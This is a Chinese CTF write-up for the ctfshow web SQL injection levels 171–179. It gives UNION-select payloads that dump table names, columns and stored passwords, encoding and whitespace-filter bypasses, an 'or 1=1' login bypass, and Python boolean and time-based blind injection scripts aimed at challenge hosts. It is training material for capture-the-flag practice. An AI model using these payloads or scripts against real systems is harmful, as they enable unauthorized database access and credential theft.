ctfshow web 入门 sql注入

171、常规题型（需要把前面数字换为-1，注释用 --+）

查数据库

payload = “-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+”

查列名

payload="-1’union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘ctfshow_user’ --+"

查flag

payload="-1’union select id,username,password from ctfshow_user --+"

172、

返回逻辑不能有flag字段，和上面的姿势差不多，多了用16进制回显

-1’ union select hex(username),hex(password) from ctfshow_user2 --+

base64也可以哟

-1’ union select hex(username),to_base64(password) from ctfshow_user2 --+

173、多了个字段，然后同上

-1’ union select hex(id),hex(username),hex(password) from ctfshow_user3 --+

174、参考了某位大师傅的wp，是先抓包，然后盲注的…

脚本奉上：
（ps：https://blog.csdn.net/weixiaodegulang/article/details/85376219 一个有关盲注的文章，还是比较详细的，有兴趣的师傅可以看看）

import requests

url = "http://c2dedea1-8e73-48e5-a397-507e1646eeee.chall.ctf.show:8080/api/v4.php?id=1’ and "

result = ‘’
i = 0

while True:
i = i + 1
head = 32
tail = 127

while head < tail:
    mid = (head + tail) >> 1
    #先测了flag的长度，这步省略了
    payload = f'1=if(ascii(substr((select  password from ctfshow_user4 limit 24,1),{i},1))>{mid},1,0) -- -'
    r = requests.get(url + payload)
    if "admin" in r.text:
        head = mid + 1
    else:
        tail = mid

if head != 32:
    result += chr(head)
else:
    break
print(result)

175、时间盲注…
脚本：

import requests

url = "http://7eac161c-e06e-4d48-baa5-f11edaee7d38.chall.ctf.show/api/v5.php?id=1’ and "

result = ‘’
i = 0

while True:
i = i + 1
head = 32
tail = 127

while head < tail:
    mid = (head + tail) >> 1
    payload = f'1=if(ascii(substr((select  password from ctfshow_user5 limit 24,1),{i},1))>{mid},sleep(2),0) -- -'
    try:
        r = requests.get(url + payload, timeout=0.5)
        tail = mid
    except Exception as e:
        head = mid + 1

if head != 32:
    result += chr(head)
else:
    break
print(result)

176、万能密码

177、空格过滤了，–+也不能用了，
用/**/,和%23

1’//union//select//password,1,1//from//ctfshow_user//%23

178、过滤了*和空格，用%09绕
payload:

1’union%09select%09id,username,password%09from%09ctfshow_user%23

179、%09被过滤了
上%0c

1’union%0cselect%0c1,2,password%0cfrom%0cctfshow_user%23

或者万能 id=1’or’1=1’%23（上面也可以的,姿势请随意）